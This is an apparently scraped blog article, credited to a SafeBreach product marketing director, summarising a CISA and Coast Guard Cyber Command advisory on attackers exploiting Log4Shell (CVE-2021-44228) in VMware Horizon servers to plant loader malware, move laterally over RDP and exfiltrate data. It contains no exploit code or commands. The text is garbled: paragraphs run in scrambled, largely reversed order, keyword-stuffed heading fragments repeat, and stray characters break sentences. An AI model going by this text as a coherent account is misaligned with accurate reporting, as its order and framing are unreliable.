- #Log4shell miners infect vmware horizon servers Patch
- #Log4shell miners infect vmware horizon servers windows
The attackers at the second victim site also used RDP to access the disaster recovery network.
#Log4shell miners infect vmware horizon servers windows
At a second victim, the attackers first gained access to the VMware Horizon server and then used the Windows Remote Desktop Protocol (RDP) to gain access to hosts in the target’s production environment, including a security management server, a certificate server, a database containing sensitive law enforcement data, and a mail relay server.
#Log4shell miners infect vmware horizon servers Patch
The Log4Shell vulnerability was considered difficult to patch due to the range of end-user organizations, device manufacturers, and services affected by it.Īfter the vulnerability and its seriousness were first discovered in December 2021, CISA and CGCYBER conducted investigations at victim networks that showed attackers were using the vulnerability for more than installing “cryptojackers” or CPU-abusing crypto-mining malware.Īt one of the victims using a vulnerable version of VMware Horizon, the attackers had installed malware impersonating Microsoft’s software for admins.
Log4j is maintained by the Apache Software Foundation (ASF) but the open-source component is used in a broad array of software on devices from many other vendors, including VMware, Cisco, IBM, and Oracle. In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.Īdditional Details of the CISA/CGCYBER Investigation These threat actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2).
Additional details about this group and its associated tactics, techniques, and procedures (TTPs) are available in US-CERT Alert (AA22-174A) Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems.Īccording to the information released, multiple threat actors have continued to exploit Log4Shell on unpatched, public-facing VMware Horizon and UAG servers since December 2021. These actors are exploiting CVE-2021-44228 on VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds. On June 23 rd, the Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) issued a joint advisory highlighting the ongoing exploitation of CVE-2021-44228 (Log4Shell) by several threat actors, including state-sponsored Advanced Persistent Threat (APT) groups. Author: Kaustubh Jagtap, Product Marketing Director, SafeBreach